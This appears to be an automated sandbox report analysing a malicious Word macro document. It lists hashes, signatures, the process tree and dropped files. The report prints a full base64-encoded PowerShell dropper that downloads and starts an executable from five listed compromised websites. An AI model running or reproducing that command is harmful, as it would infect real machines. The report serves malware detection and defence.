Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03-03-2024 03:21

General

  • Target

  • Size

    139KB

  • MD5

    b92021ca10aed3046fc3be5ac1c2a094

  • SHA1

    0fb1ad5b53cdd09a7268c823ec796a6e623f086f

  • SHA256

    c378387344e0a552dc065de6bfa607fd26e0b5c569751c79fbf9c6f2e91c9807

  • SHA512

    bbeb5cfd7c5a890456b0805234a9ae325abc4a08dbad70b4ed1b3635dee4470a1f86869d5532809cecb595b9a89708f378921d733bd061aef693bfc5ee77ebb4

  • SSDEEP

    3072:/Msknok2er/yR5DpQKajNDu1CkBwN0pqJfWSq:zkoRoKDpQZqQkmN0scR

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1876

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\289958E6.wmf

      Filesize

      430B

      MD5

      6a50fb4ee0127d0961a2329a7fc8a625

      SHA1

      82ee8114c98ef9badf572a6c1a1f7adb939c5967

      SHA256

      73918e4160fbda143681a47390f6e524367ef32e6a6dfdb37d35d20e69310a90

      SHA512

      9c1ebf270bcaf55cd0bafa2994e35092adbfa6a31c732912e8486546de1382918a36fd48065744910496903b1f06ae380f124f2acd89dec0ab22ff9b9937e7de

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F63B192.wmf

      Filesize

      430B

      MD5

      5455b9480c0324f177fbb974ee761774

      SHA1

      2ee95046e21706119f7e9497503dd6c99f2c51b8

      SHA256

      475c8efccf065cf6068e35acfbf0ff3a02ff6f7556c5e880c7fbc30962c395ed

      SHA512

      6dcbac7fa2825288da00f69238c52628390c928d8301a44377069c90a91a2e1401244512457575e7b9c2429c08e62f7a2b44229db834e9333779651b2d0eced5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4812306B.wmf

      Filesize

      430B

      MD5

      3b421736acd96a3a6f5283e24f6fbedd

      SHA1

      fdaacf4ab00a2416659261765748f626018f9812

      SHA256

      5891ce21fb30d11e0c567b36ff4b650b8d87549d0039fe6187fadae5ca99afeb

      SHA512

      c356e41fe3b36b95d15b369344d96da66aefeae7698d061e8e6b00f6a3296096e4c664a45fdfd2f3a6693a775d5eafb7934ccccbf56649b32ca82fd423260191

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49A17C95.wmf

      Filesize

      430B

      MD5

      cb826272c908fe6e97167a0f1322acf9

      SHA1

      3db3bb861f93039aa3ee36e8be79cffd2c0b9741

      SHA256

      2bb86b31b4e6a58d06d0eb7f3ca692e325efd7088c48c347e9b6733e7213b61a

      SHA512

      c2f50c65eeb66809eb0a2344734413905246ccb8160124f6351e22ccd7659c578558b3724469dc5985892f139ee3a8aef1b03d868a18af143f238c202c1ad384

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51E9D0B1.wmf

      Filesize

      430B

      MD5

      b5054a556ad63063570e09cac430c5bc

      SHA1

      c31a8c873e9b3f3bc3b1ee274f82cac33acbf440

      SHA256

      5aa3740b793bf39801704e3a3014707bcf4b393f0b2060e76c0066ec149c2d87

      SHA512

      126c98f7fc6a6e77153a10a48fb3d803bae7229cd604ed6d1769cfbf05ea90f679e739dbee236e220ff5172adee738714ea33d3058a8ff0514bba37c842d0819

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\597BDE4.wmf

      Filesize

      430B

      MD5

      2dba7d62316f650d8d972bfc110986ac

      SHA1

      15cf561406fc6bbf1b5d3cedc419ee250373a1ea

      SHA256

      96a9390ac482cadc53ff50e2c413f6e64f24c12f0f901702a7cbf2d4eb0cc5c0

      SHA512

      5cedd477585d7a37d18d4fd64ddecd48788852eaae1f12ad4312ff4759a27ec8bd7e647a659d4efa5bfca1edcff8192f442af16fba396487edb6ce8365241444

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\680823BC.wmf

      Filesize

      430B

      MD5

      52368244cdd54dd682c8cad1690ea17e

      SHA1

      261e5351f653e6b7de8cfadedc39bb1d20c2f884

      SHA256

      f83c0c4976685aa3c1bbf55a54d40149751f822b31f49b0d392e8163f2d5a3bf

      SHA512

      6d675aecfcec6522b9fb7b6ec711dc66b6443ecfabb9b33d980718e3010c75a8b6365d5774c5028b85d7159d39608e10f5afd5866ce499e64767bf7a9a1de7c0

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A2AA1770.wmf

      Filesize

      430B

      MD5

      ad54247b226ef1e77b6667887af05b94

      SHA1

      b01321c9e5a4416b13c185039fa7d7d0ecd91db2

      SHA256

      0a65220c6f2e7f912b74593dc239a45f9a5683c805294cffc426fed2a05314bd

      SHA512

      fe89557d2c9dbcff39cbca0d14ed50cca3126742dd26383be3f0cc09ff44253c9b3a41656ace123da3625b7d5d3396475955301a798d44c0ed48c13bd8abf0a2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A82BC6E7.wmf

      Filesize

      430B

      MD5

      fad27b4eadf39b40ee508914ff1c193c

      SHA1

      1e1a6bf7ad38daa4fc02a27b4dde2a67579aa804

      SHA256

      bec847b8172f4607d0e2f5a38481a4ca89ac27b19b0d6abf0a55658df88ccc97

      SHA512

      7f41190915b8a3057f85126cb05163b0b0813ad6b73a25bf26555112d9441023e1c4a75e60f803d02c4613ecbba3d8b7f0725bd05585a9aa6093a3bdb1db1de7

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B34F1EFE.wmf

      Filesize

      430B

      MD5

      48fae00d46392c20a39260221c2f8c80

      SHA1

      7101a6014b2edb65c53a792a6d8857351dacda42

      SHA256

      3044c26ba56d4cd91f5c7007f02247aa45c683d781dbf10be1e72ab5c4e01272

      SHA512

      a595b74434f877dfbf4fb2f93dabf7584b472058321ef83ba68b98efbba48ba543e514842d9270ba037a7b8e05548f22d2dee0adf38465eef8cc664d87441d63

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D7AB27AF.wmf

      Filesize

      430B

      MD5

      8db3c55fd4ebdf6b501d86616b0c91f3

      SHA1

      cdcbace9b8148e7da6279a0f9b02217d220b6b8a

      SHA256

      f4cc61e5103cbec3b0443712d8c626ff26be650538d887de9e500b5f12954a6a

      SHA512

      3b53095fe8ffb7997ac0ee0b1cb2dbb73ef2d85044a6c822987b0a03dc82b97928beaae4423e715079005dde6bcb7ae8d7db4e5293f6f6878a550b556f8440fe

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2F02039.wmf

      Filesize

      430B

      MD5

      26061f64e30458cb32218bf3d23fa7e8

      SHA1

      d52a6bceb43b02bccd5609c73fbffe49b1589a30

      SHA256

      75b0d651191e5ba0011dda2db2840ea6b4b9d847dae45a0aa61e029e93169293

      SHA512

      1050cb4a47a9c70afc223008faa50fc23e970d65718e26402cac0afd9ff2789170a33b47e3f9da63666a9dd1bf5c866c3c554efb68a2e2db7e995240616c24a4

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      1cda40ad764e9d68a908dae4a4f40ecb

      SHA1

      3f77d146cf29f556f1d4686879e9067c482d1994

      SHA256

      1cb047541d2c9c7b0947338c745a5316dbf90219940918ad8368b266c6b2669b

      SHA512

      5d75b63bb12146097af6d7888eaa5a3407e2dd02a195e1430f2e6d7e26461e4187cad984b1ad1cbaf0a3ab476f2b2373edf8d6464018435a7b67c2bacb029fa8

    • memory/1876-173-0x0000000002A00000-0x0000000002A80000-memory.dmp

      Filesize

      512KB

    • memory/1876-159-0x0000000001E80000-0x0000000001E88000-memory.dmp

      Filesize

      32KB

    • memory/1876-182-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

      Filesize

      9.6MB

    • memory/1876-181-0x0000000002A00000-0x0000000002A80000-memory.dmp

      Filesize

      512KB

    • memory/1876-175-0x0000000002A00000-0x0000000002A80000-memory.dmp

      Filesize

      512KB

    • memory/1876-176-0x0000000002A00000-0x0000000002A80000-memory.dmp

      Filesize

      512KB

    • memory/1876-174-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

      Filesize

      9.6MB

    • memory/1876-165-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

      Filesize

      9.6MB

    • memory/1876-158-0x000000001B740000-0x000000001BA22000-memory.dmp

      Filesize

      2.9MB

    • memory/2732-151-0x00000000068E0000-0x0000000006AE0000-memory.dmp

      Filesize

      2.0MB

    • memory/2732-152-0x0000000005480000-0x0000000005580000-memory.dmp

      Filesize

      1024KB

    • memory/2732-0-0x000000002F4E1000-0x000000002F4E2000-memory.dmp

      Filesize

      4KB

    • memory/2732-66-0x0000000006690000-0x0000000006790000-memory.dmp

      Filesize

      1024KB

    • memory/2732-150-0x00000000068E0000-0x0000000006AE0000-memory.dmp

      Filesize

      2.0MB

    • memory/2732-149-0x0000000005480000-0x0000000005580000-memory.dmp

      Filesize

      1024KB

    • memory/2732-131-0x0000000005480000-0x0000000005580000-memory.dmp

      Filesize

      1024KB

    • memory/2732-2-0x0000000070F7D000-0x0000000070F88000-memory.dmp

      Filesize

      44KB

    • memory/2732-183-0x0000000070F7D000-0x0000000070F88000-memory.dmp

      Filesize

      44KB

    • memory/2732-184-0x0000000005480000-0x0000000005580000-memory.dmp

      Filesize

      1024KB

    • memory/2732-185-0x00000000068E0000-0x0000000006AE0000-memory.dmp

      Filesize

      2.0MB

    • memory/2732-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2732-208-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB